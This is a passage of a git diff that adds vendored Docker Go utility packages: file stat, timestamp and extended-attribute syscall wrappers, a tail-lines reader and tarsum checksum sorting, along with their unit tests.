0000000000..f0742f59e5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_darwin.go @@ -0,0 +1,32 @@ +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtimespec}, nil +} + +// FromStatT loads a system.StatT from a syscall.Stat_t. +func FromStatT(s *syscall.Stat_t) (*StatT, error) { + return fromStatT(s) +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go new file mode 100644 index 0000000000..d0fb6f1519 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_freebsd.go @@ -0,0 +1,27 @@ +package system + +import ( + "syscall" +) + +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtimespec}, nil +} + +// Stat takes a path to a file and returns +// a system.Stat_t type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_linux.go b/vendor/github.com/docker/docker/pkg/system/stat_linux.go new file mode 100644 index 0000000000..8b1eded138 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_linux.go @@ -0,0 +1,33 @@ +package system + +import ( + "syscall" +) + +// fromStatT converts a syscall.Stat_t type to a system.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: s.Mode, + uid: s.Uid, + gid: s.Gid, + rdev: s.Rdev, + mtim: s.Mtim}, nil +} + +// FromStatT exists only on linux, and loads a system.StatT from a +// syscal.Stat_t. +func FromStatT(s *syscall.Stat_t) (*StatT, error) { + return fromStatT(s) +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go new file mode 100644 index 0000000000..3c3b71fb21 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_openbsd.go @@ -0,0 +1,15 @@ +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtim}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_solaris.go b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go new file mode 100644 index 0000000000..0216985a25 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_solaris.go @@ -0,0 +1,34 @@ +// +build solaris + +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtim}, nil +} + +// FromStatT loads a system.StatT from a syscal.Stat_t. +func FromStatT(s *syscall.Stat_t) (*StatT, error) { + return fromStatT(s) +} + +// Stat takes a path to a file and returns +// a system.StatT type pertaining to that file. +// +// Throws an error if the file does not exist +func Stat(path string) (*StatT, error) { + s := &syscall.Stat_t{} + if err := syscall.Stat(path, s); err != nil { + return nil, err + } + return fromStatT(s) +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go new file mode 100644 index 0000000000..dee8d30a19 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_unix_test.go @@ -0,0 +1,39 @@ +// +build linux freebsd + +package system + +import ( + "os" + "syscall" + "testing" +) + +// TestFromStatT tests fromStatT for a tempfile +func TestFromStatT(t *testing.T) { + file, _, _, dir := prepareFiles(t) + defer os.RemoveAll(dir) + + stat := &syscall.Stat_t{} + err := syscall.Lstat(file, stat) + + s, err := fromStatT(stat) + if err != nil { + t.Fatal(err) + } + + if stat.Mode != s.Mode() { + t.Fatal("got invalid mode") + } + if stat.Uid != s.UID() { + t.Fatal("got invalid uid") + } + if stat.Gid != s.GID() { + t.Fatal("got invalid gid") + } + if stat.Rdev != s.Rdev() { + t.Fatal("got invalid rdev") + } + if stat.Mtim != s.Mtim() { + t.Fatal("got invalid mtim") + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go new file mode 100644 index 0000000000..5d85f523cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_unsupported.go @@ -0,0 +1,17 @@ +// +build !linux,!windows,!freebsd,!solaris,!openbsd,!darwin + +package system + +import ( + "syscall" +) + +// fromStatT creates a system.StatT type from a syscall.Stat_t type +func fromStatT(s *syscall.Stat_t) (*StatT, error) { + return &StatT{size: s.Size, + mode: uint32(s.Mode), + uid: s.Uid, + gid: s.Gid, + rdev: uint64(s.Rdev), + mtim: s.Mtimespec}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/stat_windows.go b/vendor/github.com/docker/docker/pkg/system/stat_windows.go new file mode 100644 index 0000000000..39490c625c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/stat_windows.go @@ -0,0 +1,43 @@ +// +build windows + +package system + +import ( + "os" + "time" +) + +// StatT type contains status of a file. It contains metadata +// like name, permission, size, etc about a file. +type StatT struct { + name string + size int64 + mode os.FileMode + modTime time.Time + isDir bool +} + +// Name returns file's name. +func (s StatT) Name() string { + return s.name +} + +// Size returns file's size. +func (s StatT) Size() int64 { + return s.size +} + +// Mode returns file's permission mode. +func (s StatT) Mode() os.FileMode { + return s.mode +} + +// ModTime returns file's last modification time. +func (s StatT) ModTime() time.Time { + return s.modTime +} + +// IsDir returns whether file is actually a directory. +func (s StatT) IsDir() bool { + return s.isDir +} diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_unix.go b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go new file mode 100644 index 0000000000..3ae9128468 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/syscall_unix.go @@ -0,0 +1,17 @@ +// +build linux freebsd + +package system + +import "syscall" + +// Unmount is a platform-specific helper function to call +// the unmount syscall. +func Unmount(dest string) error { + return syscall.Unmount(dest, 0) +} + +// CommandLineToArgv should not be used on Unix. +// It simply returns commandLine in the only element in the returned array. +func CommandLineToArgv(commandLine string) ([]string, error) { + return []string{commandLine}, nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go new file mode 100644 index 0000000000..1f311874f4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows.go @@ -0,0 +1,105 @@ +package system + +import ( + "syscall" + "unsafe" + + "github.com/Sirupsen/logrus" +) + +var ( + ntuserApiset = syscall.NewLazyDLL("ext-ms-win-ntuser-window-l1-1-0") + procGetVersionExW = modkernel32.NewProc("GetVersionExW") +) + +// OSVersion is a wrapper for Windows version information +// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724439(v=vs.85).aspx +type OSVersion struct { + Version uint32 + MajorVersion uint8 + MinorVersion uint8 + Build uint16 +} + +// https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx +type osVersionInfoEx struct { + OSVersionInfoSize uint32 + MajorVersion uint32 + MinorVersion uint32 + BuildNumber uint32 + PlatformID uint32 + CSDVersion [128]uint16 + ServicePackMajor uint16 + ServicePackMinor uint16 + SuiteMask uint16 + ProductType byte + Reserve byte +} + +// GetOSVersion gets the operating system version on Windows. Note that +// docker.exe must be manifested to get the correct version information. +func GetOSVersion() OSVersion { + var err error + osv := OSVersion{} + osv.Version, err = syscall.GetVersion() + if err != nil { + // GetVersion never fails. + panic(err) + } + osv.MajorVersion = uint8(osv.Version & 0xFF) + osv.MinorVersion = uint8(osv.Version >> 8 & 0xFF) + osv.Build = uint16(osv.Version >> 16) + return osv +} + +// IsWindowsClient returns true if the SKU is client +// @engine maintainers - this function should not be removed or modified as it +// is used to enforce licensing restrictions on Windows. +func IsWindowsClient() bool { + osviex := &osVersionInfoEx{OSVersionInfoSize: 284} + r1, _, err := procGetVersionExW.Call(uintptr(unsafe.Pointer(osviex))) + if r1 == 0 { + logrus.Warnf("GetVersionExW failed - assuming server SKU: %v", err) + return false + } + const verNTWorkstation = 0x00000001 + return osviex.ProductType == verNTWorkstation +} + +// Unmount is a platform-specific helper function to call +// the unmount syscall. Not supported on Windows +func Unmount(dest string) error { + return nil +} + +// CommandLineToArgv wraps the Windows syscall to turn a commandline into an argument array. +func CommandLineToArgv(commandLine string) ([]string, error) { + var argc int32 + + argsPtr, err := syscall.UTF16PtrFromString(commandLine) + if err != nil { + return nil, err + } + + argv, err := syscall.CommandLineToArgv(argsPtr, &argc) + if err != nil { + return nil, err + } + defer syscall.LocalFree(syscall.Handle(uintptr(unsafe.Pointer(argv)))) + + newArgs := make([]string, argc) + for i, v := range (*argv)[:argc] { + newArgs[i] = string(syscall.UTF16ToString((*v)[:])) + } + + return newArgs, nil +} + +// HasWin32KSupport determines whether containers that depend on win32k can +// run on this machine. Win32k is the driver used to implement windowing. +func HasWin32KSupport() bool { + // For now, check for ntuser API support on the host. In the future, a host + // may support win32k in containers even if the host does not support ntuser + // APIs. + return ntuserApiset.Load() == nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go new file mode 100644 index 0000000000..4886b2b9b4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go @@ -0,0 +1,9 @@ +package system + +import "testing" + +func TestHasWin32KSupport(t *testing.T) { + s := HasWin32KSupport() // make sure this doesn't panic + + t.Logf("win32k: %v", s) // will be different on different platforms -- informative only +} diff --git a/vendor/github.com/docker/docker/pkg/system/umask.go b/vendor/github.com/docker/docker/pkg/system/umask.go new file mode 100644 index 0000000000..3d0146b01a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/umask.go @@ -0,0 +1,13 @@ +// +build !windows + +package system + +import ( + "syscall" +) + +// Umask sets current process's file mode creation mask to newmask +// and returns oldmask. +func Umask(newmask int) (oldmask int, err error) { + return syscall.Umask(newmask), nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/umask_windows.go b/vendor/github.com/docker/docker/pkg/system/umask_windows.go new file mode 100644 index 0000000000..13f1de1769 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/umask_windows.go @@ -0,0 +1,9 @@ +// +build windows + +package system + +// Umask is not supported on the windows platform. +func Umask(newmask int) (oldmask int, err error) { + // should not be called on cli code path + return 0, ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go new file mode 100644 index 0000000000..e2eac3b553 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go @@ -0,0 +1,22 @@ +package system + +import ( + "syscall" + "unsafe" +) + +// LUtimesNano is used to change access and modification time of the specified path. +// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +func LUtimesNano(path string, ts []syscall.Timespec) error { + var _path *byte + _path, err := syscall.BytePtrFromString(path) + if err != nil { + return err + } + + if _, _, err := syscall.Syscall(syscall.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != syscall.ENOSYS { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go new file mode 100644 index 0000000000..fc8a1aba95 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go @@ -0,0 +1,26 @@ +package system + +import ( + "syscall" + "unsafe" +) + +// LUtimesNano is used to change access and modification time of the specified path. +// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm. +func LUtimesNano(path string, ts []syscall.Timespec) error { + // These are not currently available in syscall + atFdCwd := -100 + atSymLinkNoFollow := 0x100 + + var _path *byte + _path, err := syscall.BytePtrFromString(path) + if err != nil { + return err + } + + if _, _, err := syscall.Syscall6(syscall.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), uintptr(atSymLinkNoFollow), 0, 0); err != 0 && err != syscall.ENOSYS { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go new file mode 100644 index 0000000000..a73ed118c9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go @@ -0,0 +1,68 @@ +// +build linux freebsd + +package system + +import ( + "io/ioutil" + "os" + "path/filepath" + "syscall" + "testing" +) + +// prepareFiles creates files for testing in the temp directory +func prepareFiles(t *testing.T) (string, string, string, string) { + dir, err := ioutil.TempDir("", "docker-system-test") + if err != nil { + t.Fatal(err) + } + + file := filepath.Join(dir, "exist") + if err := ioutil.WriteFile(file, []byte("hello"), 0644); err != nil { + t.Fatal(err) + } + + invalid := filepath.Join(dir, "doesnt-exist") + + symlink := filepath.Join(dir, "symlink") + if err := os.Symlink(file, symlink); err != nil { + t.Fatal(err) + } + + return file, invalid, symlink, dir +} + +func TestLUtimesNano(t *testing.T) { + file, invalid, symlink, dir := prepareFiles(t) + defer os.RemoveAll(dir) + + before, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + + ts := []syscall.Timespec{{Sec: 0, Nsec: 0}, {Sec: 0, Nsec: 0}} + if err := LUtimesNano(symlink, ts); err != nil { + t.Fatal(err) + } + + symlinkInfo, err := os.Lstat(symlink) + if err != nil { + t.Fatal(err) + } + if before.ModTime().Unix() == symlinkInfo.ModTime().Unix() { + t.Fatal("The modification time of the symlink should be different") + } + + fileInfo, err := os.Stat(file) + if err != nil { + t.Fatal(err) + } + if before.ModTime().Unix() != fileInfo.ModTime().Unix() { + t.Fatal("The modification time of the file should be same") + } + + if err := LUtimesNano(invalid, ts); err == nil { + t.Fatal("Doesn't return an error on a non-existing file") + } +} diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go new file mode 100644 index 0000000000..139714544d --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go @@ -0,0 +1,10 @@ +// +build !linux,!freebsd + +package system + +import "syscall" + +// LUtimesNano is only supported on linux and freebsd. +func LUtimesNano(path string, ts []syscall.Timespec) error { + return ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go new file mode 100644 index 0000000000..d2e2c05799 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go @@ -0,0 +1,63 @@ +package system + +import ( + "syscall" + "unsafe" +) + +// Lgetxattr retrieves the value of the extended attribute identified by attr +// and associated with the given path in the file system. +// It will returns a nil slice and nil error if the xattr is not set. +func Lgetxattr(path string, attr string) ([]byte, error) { + pathBytes, err := syscall.BytePtrFromString(path) + if err != nil { + return nil, err + } + attrBytes, err := syscall.BytePtrFromString(attr) + if err != nil { + return nil, err + } + + dest := make([]byte, 128) + destBytes := unsafe.Pointer(&dest[0]) + sz, _, errno := syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) + if errno == syscall.ENODATA { + return nil, nil + } + if errno == syscall.ERANGE { + dest = make([]byte, sz) + destBytes := unsafe.Pointer(&dest[0]) + sz, _, errno = syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0) + } + if errno != 0 { + return nil, errno + } + + return dest[:sz], nil +} + +var _zero uintptr + +// Lsetxattr sets the value of the extended attribute identified by attr +// and associated with the given path in the file system. +func Lsetxattr(path string, attr string, data []byte, flags int) error { + pathBytes, err := syscall.BytePtrFromString(path) + if err != nil { + return err + } + attrBytes, err := syscall.BytePtrFromString(attr) + if err != nil { + return err + } + var dataBytes unsafe.Pointer + if len(data) > 0 { + dataBytes = unsafe.Pointer(&data[0]) + } else { + dataBytes = unsafe.Pointer(&_zero) + } + _, _, errno := syscall.Syscall6(syscall.SYS_LSETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(dataBytes), uintptr(len(data)), uintptr(flags), 0) + if errno != 0 { + return errno + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go new file mode 100644 index 0000000000..0114f2227c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go @@ -0,0 +1,13 @@ +// +build !linux + +package system + +// Lgetxattr is not supported on platforms other than linux. +func Lgetxattr(path string, attr string) ([]byte, error) { + return nil, ErrNotSupportedPlatform +} + +// Lsetxattr is not supported on platforms other than linux. +func Lsetxattr(path string, attr string, data []byte, flags int) error { + return ErrNotSupportedPlatform +} diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go new file mode 100644 index 0000000000..09eb393ab7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go @@ -0,0 +1,66 @@ +// Package tailfile provides helper functions to read the nth lines of any +// ReadSeeker. +package tailfile + +import ( + "bytes" + "errors" + "io" + "os" +) + +const blockSize = 1024 + +var eol = []byte("\n") + +// ErrNonPositiveLinesNumber is an error returned if the lines number was negative. +var ErrNonPositiveLinesNumber = errors.New("The number of lines to extract from the file must be positive") + +//TailFile returns last n lines of reader f (could be a fil). +func TailFile(f io.ReadSeeker, n int) ([][]byte, error) { + if n <= 0 { + return nil, ErrNonPositiveLinesNumber + } + size, err := f.Seek(0, os.SEEK_END) + if err != nil { + return nil, err + } + block := -1 + var data []byte + var cnt int + for { + var b []byte + step := int64(block * blockSize) + left := size + step // how many bytes to beginning + if left < 0 { + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + return nil, err + } + b = make([]byte, blockSize+left) + if _, err := f.Read(b); err != nil { + return nil, err + } + data = append(b, data...) + break + } else { + b = make([]byte, blockSize) + if _, err := f.Seek(left, os.SEEK_SET); err != nil { + return nil, err + } + if _, err := f.Read(b); err != nil { + return nil, err + } + data = append(b, data...) + } + cnt += bytes.Count(b, eol) + if cnt > n { + break + } + block-- + } + lines := bytes.Split(data, eol) + if n < len(lines) { + return lines[len(lines)-n-1 : len(lines)-1], nil + } + return lines[:len(lines)-1], nil +} diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go new file mode 100644 index 0000000000..31217c036c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go @@ -0,0 +1,148 @@ +package tailfile + +import ( + "io/ioutil" + "os" + "testing" +) + +func TestTailFile(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + testFile := []byte(`first line +second line +third line +fourth line +fifth line +next first line +next second line +next third line +next fourth line +next fifth line +last first line +next first line +next second line +next third line +next fourth line +next fifth line +next first line +next second line +next third line +next fourth line +next fifth line +last second line +last third line +last fourth line +last fifth line +truncated line`) + if _, err := f.Write(testFile); err != nil { + t.Fatal(err) + } + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + t.Fatal(err) + } + expected := []string{"last fourth line", "last fifth line"} + res, err := TailFile(f, 2) + if err != nil { + t.Fatal(err) + } + for i, l := range res { + t.Logf("%s", l) + if expected[i] != string(l) { + t.Fatalf("Expected line %s, got %s", expected[i], l) + } + } +} + +func TestTailFileManyLines(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + testFile := []byte(`first line +second line +truncated line`) + if _, err := f.Write(testFile); err != nil { + t.Fatal(err) + } + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + t.Fatal(err) + } + expected := []string{"first line", "second line"} + res, err := TailFile(f, 10000) + if err != nil { + t.Fatal(err) + } + for i, l := range res { + t.Logf("%s", l) + if expected[i] != string(l) { + t.Fatalf("Expected line %s, got %s", expected[i], l) + } + } +} + +func TestTailEmptyFile(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + res, err := TailFile(f, 10000) + if err != nil { + t.Fatal(err) + } + if len(res) != 0 { + t.Fatal("Must be empty slice from empty file") + } +} + +func TestTailNegativeN(t *testing.T) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + t.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + testFile := []byte(`first line +second line +truncated line`) + if _, err := f.Write(testFile); err != nil { + t.Fatal(err) + } + if _, err := f.Seek(0, os.SEEK_SET); err != nil { + t.Fatal(err) + } + if _, err := TailFile(f, -1); err != ErrNonPositiveLinesNumber { + t.Fatalf("Expected ErrNonPositiveLinesNumber, got %s", err) + } + if _, err := TailFile(f, 0); err != ErrNonPositiveLinesNumber { + t.Fatalf("Expected ErrNonPositiveLinesNumber, got %s", err) + } +} + +func BenchmarkTail(b *testing.B) { + f, err := ioutil.TempFile("", "tail-test") + if err != nil { + b.Fatal(err) + } + defer f.Close() + defer os.RemoveAll(f.Name()) + for i := 0; i < 10000; i++ { + if _, err := f.Write([]byte("tailfile pretty interesting line\n")); err != nil { + b.Fatal(err) + } + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + if _, err := TailFile(f, 1000); err != nil { + b.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go new file mode 100644 index 0000000000..b42983e984 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go @@ -0,0 +1,21 @@ +package tarsum + +// BuilderContext is an interface extending TarSum by adding the Remove method. +// In general there was concern about adding this method to TarSum itself +// so instead it is being added just to "BuilderContext" which will then +// only be used during the .dockerignore file processing +// - see builder/evaluator.go +type BuilderContext interface { + TarSum + Remove(string) +} + +func (bc *tarSum) Remove(filename string) { + for i, fis := range bc.sums { + if fis.Name() == filename { + bc.sums = append(bc.sums[:i], bc.sums[i+1:]...) + // Note, we don't just return because there could be + // more than one with this name + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go new file mode 100644 index 0000000000..f54bf3a1bd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go @@ -0,0 +1,67 @@ +package tarsum + +import ( + "io" + "io/ioutil" + "os" + "testing" +) + +// Try to remove tarsum (in the BuilderContext) that do not exists, won't change a thing +func TestTarSumRemoveNonExistent(t *testing.T) { + filename := "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar" + reader, err := os.Open(filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + ts, err := NewTarSum(reader, false, Version0) + if err != nil { + t.Fatal(err) + } + + // Read and discard bytes so that it populates sums + _, err = io.Copy(ioutil.Discard, ts) + if err != nil { + t.Errorf("failed to read from %s: %s", filename, err) + } + + expected := len(ts.GetSums()) + + ts.(BuilderContext).Remove("") + ts.(BuilderContext).Remove("Anything") + + if len(ts.GetSums()) != expected { + t.Fatalf("Expected %v sums, go %v.", expected, ts.GetSums()) + } +} + +// Remove a tarsum (in the BuilderContext) +func TestTarSumRemove(t *testing.T) { + filename := "testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar" + reader, err := os.Open(filename) + if err != nil { + t.Fatal(err) + } + defer reader.Close() + + ts, err := NewTarSum(reader, false, Version0) + if err != nil { + t.Fatal(err) + } + + // Read and discard bytes so that it populates sums + _, err = io.Copy(ioutil.Discard, ts) + if err != nil { + t.Errorf("failed to read from %s: %s", filename, err) + } + + expected := len(ts.GetSums()) - 1 + + ts.(BuilderContext).Remove("etc/sudoers") + + if len(ts.GetSums()) != expected { + t.Fatalf("Expected %v sums, go %v.", expected, len(ts.GetSums())) + } +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go new file mode 100644 index 0000000000..5abf5e7ba3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go @@ -0,0 +1,126 @@ +package tarsum + +import "sort" + +// FileInfoSumInterface provides an interface for accessing file checksum +// information within a tar file. This info is accessed through interface +// so the actual name and sum cannot be melded with. +type FileInfoSumInterface interface { + // File name + Name() string + // Checksum of this particular file and its headers + Sum() string + // Position of file in the tar + Pos() int64 +} + +type fileInfoSum struct { + name string + sum string + pos int64 +} + +func (fis fileInfoSum) Name() string { + return fis.name +} +func (fis fileInfoSum) Sum() string { + return fis.sum +} +func (fis fileInfoSum) Pos() int64 { + return fis.pos +} + +// FileInfoSums provides a list of FileInfoSumInterfaces. +type FileInfoSums []FileInfoSumInterface + +// GetFile returns the first FileInfoSumInterface with a matching name. +func (fis FileInfoSums) GetFile(name string) FileInfoSumInterface { + for i := range fis { + if fis[i].Name() == name { + return fis[i] + } + } + return nil +} + +// GetAllFile returns a FileInfoSums with all matching names. +func (fis FileInfoSums) GetAllFile(name string) FileInfoSums { + f := FileInfoSums{} + for i := range fis { + if fis[i].Name() == name { + f = append(f, fis[i]) + } + } + return f +} + +// GetDuplicatePaths returns a FileInfoSums with all duplicated paths. +func (fis FileInfoSums) GetDuplicatePaths() (dups FileInfoSums) { + seen := make(map[string]int, len(fis)) // allocate earl. no need to grow this map. + for i := range fis { + f := fis[i] + if _, ok := seen[f.Name()]; ok { + dups = append(dups, f) + } else { + seen[f.Name()] = 0 + } + } + return dups +} + +// Len returns the size of the FileInfoSums. +func (fis FileInfoSums) Len() int { return len(fis) } + +// Swap swaps two FileInfoSum values if a FileInfoSums list. +func (fis FileInfoSums) Swap(i, j int) { fis[i], fis[j] = fis[j], fis[i] } + +// SortByPos sorts FileInfoSums content by position. +func (fis FileInfoSums) SortByPos() { + sort.Sort(byPos{fis}) +} + +// SortByNames sorts FileInfoSums content by name. +func (fis FileInfoSums) SortByNames() { + sort.Sort(byName{fis}) +} + +// SortBySums sorts FileInfoSums content by sums. +func (fis FileInfoSums) SortBySums() { + dups := fis.GetDuplicatePaths() + if len(dups) > 0 { + sort.Sort(bySum{fis, dups}) + } else { + sort.Sort(bySum{fis, nil}) + } +} + +// byName is a sort.Sort helper for sorting by file names. +// If names are the same, order them by their appearance in the tar archive +type byName struct{ FileInfoSums } + +func (bn byName) Less(i, j int) bool { + if bn.FileInfoSums[i].Name() == bn.FileInfoSums[j].Name() { + return bn.FileInfoSums[i].Pos() < bn.FileInfoSums[j].Pos() + } + return bn.FileInfoSums[i].Name() < bn.FileInfoSums[j].Name() +} + +// bySum is a sort.Sort helper for sorting by the sums of all the fileinfos in the tar archive +type bySum struct { + FileInfoSums + dups FileInfoSums +} + +func (bs bySum) Less(i, j int) bool { + if bs.dups != nil && bs.FileInfoSums[i].Name() == bs.FileInfoSums[j].Name() { + return bs.FileInfoSums[i].Pos() < bs.FileInfoSums[j].Pos() + } + return bs.FileInfoSums[i].Sum() < bs.FileInfoSums[j].Sum() +} + +// byPos is a sort.Sort helper for sorting by the sums of all the fileinfos by their original order +type byPos struct{ FileInfoSums } + +func (bp byPos) Less(i, j int) bool { + return bp.FileInfoSums[i].Pos() < bp.FileInfoSums[j].Pos() +} diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go new file mode 100644 index 0000000000..bb700d8bde --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go @@ -0,0 +1,62 @@ +package tarsum + +import "testing" + +func newFileInfoSums() FileInfoSums { + return FileInfoSums{ + fileInfoSum{name: "file3", sum: "2abcdef1234567890", pos: 2}, + fileInfoSum{name: "dup1", sum: "deadbeef1", pos: 5}, + fileInfoSum{name: "file1", sum: "0abcdef1234567890", pos: 0}, + fileInfoSum{name: "file4", sum: "3abcdef1234567890", pos: 3}, + fileInfoSum{name: "dup1", sum: "deadbeef0", pos: 4}, 